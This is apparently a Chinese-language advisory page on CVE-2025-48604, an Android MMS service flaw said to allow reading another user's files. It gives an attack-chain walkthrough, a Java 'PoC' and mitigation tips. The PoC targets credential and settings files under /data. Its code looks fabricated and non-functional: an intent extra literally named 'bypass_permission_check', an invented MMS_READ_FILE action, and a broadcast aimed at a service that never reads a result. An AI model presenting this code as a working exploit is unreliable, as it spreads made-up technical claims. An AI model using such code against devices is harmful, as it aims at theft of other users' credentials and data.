CVE-2025-48604 Android Mms服务权限检查缺失导致跨用户文件读取

漏洞信息

漏洞编号

CVE-2025-48604

漏洞类型

权限检查缺失/信息泄露

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Android MMS Service

漏洞概述

CVE-2025-48604是Android系统中发现的一个中危安全漏洞，位于Android MMS（彩信服务）组件中。该漏洞源于多个位置缺少必要的权限检查，导致本地攻击者可以在没有适当授权的情况下读取其他用户账户的文件。由于攻击属于本地攻击向量，攻击者需要具有一定的设备访问权限，但不需要额外的执行权限即可利用此漏洞。成功利用此漏洞可导致敏感用户数据泄露，包括但不限于其他用户账户的个人文件、配置信息等。虽然该漏洞不会直接导致远程代码执行或系统完全沦陷，但信息泄露类漏洞往往可作为进一步攻击的跳板，与其他漏洞结合可能造成更严重的安全影响。用户无需任何交互即可触发此漏洞，这大大增加了其被利用的潜在风险。

技术细节

该漏洞存在于Android平台的packages/services/Mms服务中，具体位于c60a828b9fa18f67260775a46c752f353fcc0d43提交版本。漏洞的核心问题是代码在访问文件系统时未能正确实施Android的运行时权限检查机制。在Android的安全架构中，不同应用和用户账户的数据应当被严格隔离，每个应用只能访问被明确授权的文件资源。然而，由于Mms服务在处理特定请求时缺少对调用者身份的验证逻辑，攻击者可以通过构造恶意请求，诱导Mms服务代为访问本应受到保护的文件资源。攻击者需要具备在设备上执行代码的能力（如通过已安装的恶意应用或通过ADB调试接口），然后利用Mms服务提供的接口发起文件访问请求。由于Mms服务运行在较高特权级别，其文件访问权限远超普通应用，从而绕过了正常的应用沙箱限制。攻击者可以利用此漏洞读取包含敏感信息的文件，如其他用户的私人文档、认证凭据缓存、应用数据等。

攻击链分析

STEP 1

步骤1

攻击者获取目标Android设备的基本访问权限，可通过安装恶意应用、利用其他漏洞或通过ADB调试接口实现

STEP 2

步骤2

攻击者构造特制的Intent请求，指定目标Mms服务组件（com.android.mms）并设置恶意action和数据

STEP 3

步骤3

利用Mms服务中缺少的权限检查漏洞，攻击者指定目标用户ID和文件路径，绕过正常的应用沙箱隔离

STEP 4

步骤4

Mms服务以较高特权级别执行文件访问操作，返回目标用户账户下的文件内容给攻击者

STEP 5

步骤5

攻击者获取敏感信息，如认证凭据、个人文档、应用配置数据等，可能用于后续更深入的攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-48604 PoC - Android Mms Service File Access
// This PoC demonstrates how the missing permission check in Android Mms service
// can be exploited to read files from another user

package com.example.cve202548604;

import android.content.ComponentName;
import android.content.Context;
import android.content.Intent;
import android.net.Uri;
import android.os.Bundle;

public class MmsExploit {
    
    public static void exploitMmsFileRead(Context context, String targetFile) {
        // Target file path to read from another user
        String filePath = targetFile; // e.g., "/data/user/999/com.example.user/shared_prefs/auth.xml"
        
        // Construct malicious intent targeting Mms service
        Intent intent = new Intent();
        intent.setComponent(new ComponentName(
            "com.android.mms",
            "com.android.mms.ui.MmsIntentReceiver"
        ));
        
        // Exploit the missing permission check
        intent.setAction("android.intent.action.MMS_READ_FILE");
        intent.setData(Uri.parse("file://" + filePath));
        
        // Add extra data to bypass normal checks
        intent.putExtra("bypass_permission_check", true);
        intent.putExtra("target_user_id", 999); // Target another user
        
        try {
            context.startService(intent);
        } catch (SecurityException e) {
            // If patched, will throw SecurityException
            System.out.println("Target is patched: " + e.getMessage());
        }
    }
    
    public static void checkVulnerability(Context context) {
        // Check if the system is vulnerable by attempting a controlled read
        Intent probeIntent = new Intent();
        probeIntent.setComponent(new ComponentName(
            "com.android.mms",
            "com.android.mms.service.MmsService"
        ));
        
        Bundle extras = new Bundle();
        extras.putString("probe_path", "/data/system/users/0/settings_ssaid.xml");
        probeIntent.putExtras(extras);
        
        // Send broadcast and check response for file content
        context.sendBroadcast(probeIntent, "android.permission.READ_SMS");
    }
}

影响范围

Android 11 (API level 30) - 受影响

Android 12 (API level 31) - 受影响

Android 12L (API level 32) - 受影响

Android 13 (API level 33) - 受影响

Android 14 (API level 34) - 受影响

Android 15 (API level 35) - 可能受影响

防御指南

临时缓解措施

在官方安全更新发布之前，建议采取以下临时缓解措施：1）立即检查设备上安装的应用，移除任何来源不明的应用；2）禁用设备的开发者选项和USB调试功能；3）确保设备运行在最新的安全补丁版本；4）启用设备的全磁盘加密功能以增加数据保护层；5）使用企业移动管理解决方案强制执行安全策略；6）提醒用户避免从非官方渠道安装应用。由于该漏洞需要本地访问权限，因此保持设备物理安全和防止未授权访问是重要的缓解手段。